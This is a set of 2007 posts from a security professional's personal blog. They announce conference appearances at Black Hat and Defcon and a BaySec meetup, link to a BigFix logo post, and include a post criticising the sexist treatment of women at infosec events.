For Black Hat, it looks like I'm doing a book signing on Wednesday at 4:30. BigFix is hosting the Gala at 6:00 on Wednesday as well, so I will be putting in an appearance. Please come say hi if you're around. I will also be at Defcon, but good luck spotting me in the crowd there if you don't already know what I look like.<br /><br />I look forward to catching up with friends I only get to see at cons.<br /><br />Ryan Russell (http://www.blogger.com/profile/13265663681454609204), 0 comments<br /><br />The Ladies of Infosec<br />Published 2007-07-19T10:36:00.000-07:00, updated 2008-05-03T14:21:45.021-07:00<br /><br />I was at an event not long ago, and the woman in the group was really pissed. In a room full of nothing but security geeks, someone asked her "Oh, do you do security work?"<br /><br />This didn't happen with any of the guys. The question they got was "Where do you work?"<br /><br />I was thinking about this today, and I realized that every woman I know who works in infosec has told me a similar story. That might be a slight exaggeration, but not much. Literally every one I can think of right now has told me one of these stories.<br /><br />They get things like:<br /><ul><li>Are you here with your boyfriend?</li><li>She used to be a man</li><li>Take your shirt off</li></ul>Yes, sadly I have heard jerks yell out "take your shirt off" when a woman was trying to give a talk.<br /><br />How much do women hate this? You can read what <a href="http://archives.neohapsis.com/archives/isn/2004-q2/0059.html">Raven thinks</a> about it.<br /><br />Let me tell you a little about the particular woman in question who reminded me of all this. She has worked in some of the most important software companies in the world, in the security groups. She has worked at at least two security companies that I know of. 
Pick just about any well-known security male, and they know who she is and they respect her work.<br /><br />If you've been paying attention to the infosec world, you probably know who I'm talking about. Keep it to yourself, because this particular woman is not the point.<br /><br />I have met a number of women at various conferences. I'd look really foolish if I went around assuming they weren't attendees or didn't know what they were doing. I've met a woman who works for the CIA. I've met one who was a heavy-duty cryptographer. I've met one who does BGP vulnerability research. Yes, the women are rare. Staring and asking stupid questions doesn't help improve that.<br /><br />Because of how hostile the infosec world is to women, the ones who manage to survive tend to really love what they do, and have worked very hard to stay in the field. This may mean that the woman you just met is better at security than 90% of the men. That probably includes you (and I'll happily concede that includes me.)<br /><br />Keep that in mind.<br /><br />Ryan Russell (http://www.blogger.com/profile/13265663681454609204), 9 comments<br /><br />BaySec 3 Tonight!<br />Published 2007-07-18T13:36:00.000-07:00, updated 2007-07-18T13:41:33.622-07:00<br /><br />BaySec 3 is tonight, July 18, 2007.<br /><br />Per <a href="http://rdist.root.org/2007/07/11/next-baysec-july-18-at-oneills/">Nate</a>:<br />July 18th, 7-11 pm or so. 
<br />O'Neills Irish Pub<br />747 3rd St (at King)<br /><a href="http://www.tisoneills.com/">http://www.tisoneills.com</a><br /><br />Ryan Russell (http://www.blogger.com/profile/13265663681454609204), 0 comments<br /><br />The BigFix logo<br />Published 2007-07-17T16:46:00.000-07:00, updated 2007-07-17T16:51:26.943-07:00<br /><br /><a href="http://bigblog.typepad.com/bigfix_the_relay/2007/07/cubism.html"><img style="cursor: pointer; width: 400px;" src="http://farm2.static.flickr.com/1083/801077200_d8e05b8d49.jpg?v=0" alt="" border="0" /></a><br />I promised to keep my work blogging on the <a href="http://bigblog.typepad.com/">work blog</a>, unless I thought I had been particularly clever. I think <a href="http://bigblog.typepad.com/bigfix_the_relay/2007/07/cubism.html">this one</a> qualifies.<br /><br />Ryan Russell (http://www.blogger.com/profile/13265663681454609204), 1 comment